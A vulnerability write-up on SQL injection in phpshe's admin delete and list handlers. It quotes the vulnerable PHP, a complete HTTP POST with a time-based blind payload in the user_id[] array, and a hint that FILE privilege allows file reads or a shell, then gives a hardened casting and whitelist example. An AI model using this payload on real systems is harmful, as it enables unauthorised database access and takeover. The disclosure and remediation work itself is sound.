Look at the code
admin/user.php
case 'del':
    pe_token_match();   // CSRF token check only; no validation of the ids
    // Single delete: $_g_id (GET) goes through intval(). Batch delete: the
    // $_p_user_id array (POST user_id[]) is handed to pe_delete() untouched.
    if ($db->pe_delete('user', array('user_id'=>is_array($_p_user_id) ? $_p_user_id : intval($_g_id)))) {
        pe_success('会员删除成功!');   // "Member deleted successfully"
    }
    else {
        pe_error('会员删除失败...');   // "Member delete failed"
    }
    break;
Note the asymmetry: when one user is deleted at a time the id comes from $_g_id and is cast with intval(), but when users are deleted in batch the $_p_user_id array (the POST user_id[] field) is passed to pe_delete() without any casting, so its elements are substituted into the DELETE statement as-is. Because pe_token_match() runs first, the request needs a logged-in administrator session and a valid token in the query string. The payload below uses the batch form and a time-based blind probe (sleep(5)) to confirm the injection:
POST /phpshe/admin.php?mod=user&act=del&token=d52aa9e11515574f774c9da971a4ae10 HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Referer: http://www.test.com/fiyocms/
Cookie: PHPSESSID=2j08sefmgofettspbuso00fs07
Connection: keep-alive
Upgrade-Insecure-Requests: 1
checkall=on&user_id%5B%5D=2') and if(1,sleep(5),1)#

admin/userbank.php
case 'del':
    pe_token_match();
    // Here neither path is cast: $_p_userbank_id (array) and $_g_id (scalar)
    // both reach pe_delete() as raw request input.
    $userbank_id = is_array($_p_userbank_id) ? $_p_userbank_id : $_g_id;
    if ($db->pe_delete('userbank', array('userbank_id'=>$userbank_id))) {
        pe_success('删除成功!');   // "Deleted successfully"
    }
    else {
        pe_error('删除失败...');   // "Delete failed"
    }
    break;
admin/userlevel.php
case 'del':
    pe_token_match();
    // Same pattern as admin/user.php: only the scalar path is cast.
    $userlevel_id = is_array($_p_userlevel_id) ? $_p_userlevel_id : intval($_g_id);
    if ($db->pe_delete('userlevel', array('userlevel_id'=>$userlevel_id))) {
        cache_write('userlevel');
        userlevel_callback();
        pe_success('删除成功!');   // "Deleted successfully"
    }
    else {
        pe_error('删除失败...');   // "Delete failed"
    }
    break;
admin/ad.php
case 'del':
    pe_token_match();
    // Same pattern: intval() on the scalar path only, the array is untouched.
    $ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
    if ($db->pe_delete('ad', array('ad_id'=>$ad_id))) {
        cache_write('ad');
        pe_success('删除成功!');   // "Deleted successfully"
    }
    else {
        pe_error('删除失败...');   // "Delete failed"
    }
    break;
//####################// Ad state //####################//
case 'state':
    pe_token_match();
    $ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
    // The array-path id and $_g_state are both passed to pe_update() uncast.
    if ($db->pe_update('ad', array('ad_id'=>$ad_id), array('ad_state'=>$_g_state))) {
        cache_write('ad');
        pe_success("操作成功!");   // "Operation succeeded"
    }
    else {
        pe_error("操作失败...");   // "Operation failed"
    }
    break;
//####################// Ad list //####################//
default :
    // $_g_type and $_g_position are interpolated straight into the WHERE clause
    $_g_type && $sql_where .= " and `ad_type` = '{$_g_type}'";
    $_g_position && $sql_where .= " and `ad_position` = '{$_g_position}'";
    $sql_where .= " order by `ad_order` asc, `ad_id` desc";
    $info_list = $db->pe_selectall('ad', $sql_where, '*', array(20, $_g_page));
Every one of these handlers is reachable only from the admin panel, so the attacker must already hold an administrator session, but from there the injection is straightforward. If the database account has the FILE privilege in the target environment, the same injection point can be used to read files from the server (load_file()) or to write a file and get a shell.
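The following is an added example, not code from phpshe. It models how a delete helper like pe_delete() is assumed to build its WHERE clause (a scalar becomes `col` = 'v', an array becomes `col` in ('a','b'), with the values concatenated into the SQL string); the real body of pe_delete() is not shown on this page, and the in-list form is inferred from the payload that works against it. It then shows the hardened form that casts every id on both the scalar and the array path, and the same whitelist idea applied to the ad_type filter from admin/ad.php. The helper names (where_clause_unsafe, ids_to_int, where_clause_safe, filter_clause), the unprefixed table names and the whitelist values 'img', 'text', 'code' are hypothetical.

```php
<?php
// Added example, not phpshe code. where_clause_unsafe() models the ASSUMED
// behaviour of pe_delete(): scalar -> `col` = 'v', array -> `col` in (...),
// values concatenated as strings. The real pe_delete() is not on the page.
function where_clause_unsafe($col, $value)
{
    if (is_array($value)) {
        $quoted = array_map(function ($v) { return "'" . $v . "'"; }, $value);
        return "`$col` in (" . implode(',', $quoted) . ")";
    }
    return "`$col` = '" . $value . "'";
}

// Hardened: cast every id, scalar or array element, to int, so no value can
// carry quotes, spaces or SQL operators into the statement. Ids <= 0 are
// dropped because non-numeric garbage collapses to 0 under intval().
function ids_to_int($value)
{
    $ids = is_array($value) ? $value : array($value);
    $ids = array_map('intval', $ids);
    return array_values(array_filter($ids, function ($id) { return $id > 0; }));
}

function where_clause_safe($col, $value)
{
    $ids = ids_to_int($value);
    if ($ids === array()) {
        return '0';   // matches no rows instead of touching everything
    }
    return "`$col` in (" . implode(',', $ids) . ")";
}

// Same idea for the ad list filter: ad_type / ad_position are free text in
// the original; here only values from a fixed (hypothetical) whitelist reach
// the SQL, so interpolating them is safe.
function filter_clause($col, $value, array $allowed)
{
    if ($value === null || $value === '' || !in_array($value, $allowed, true)) {
        return '';
    }
    return " and `$col` = '" . $value . "'";
}

// Constructed inputs mirroring the request on the page.
$single_id = '2';                                      // ?id=2, scalar path
$batch_ids = array("2') and if(1,sleep(5),1)#");      // user_id[]=... from the POST body

echo "single, intval path : delete from `user` where "
    . where_clause_unsafe('user_id', intval($single_id)) . "\n";
echo "batch, as shipped   : delete from `user` where "
    . where_clause_unsafe('user_id', $batch_ids) . "\n";
echo "batch, hardened     : delete from `user` where "
    . where_clause_safe('user_id', $batch_ids) . "\n";
echo "ad_type, hardened   : select * from `ad` where 1"
    . filter_clause('ad_type', "x' or 1=1#", array('img', 'text', 'code')) . "\n";
```

Run it with `php` on the command line. The "as shipped" line shows why the payload works: the `2')` closes the IN list, the `and if(1,sleep(5),1)` is evaluated as part of the WHERE clause, and the trailing `#` comments out the `')` the helper appends, which is exactly the 5-second delay the request above observes. The "hardened" line shows the same input collapsing to `in (2)`, and the ad_type line shows the injected filter value being discarded. Casting is the minimal fix for id columns; for the free-text filters on ad_type and ad_position a prepared statement with bound parameters is the more general one.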
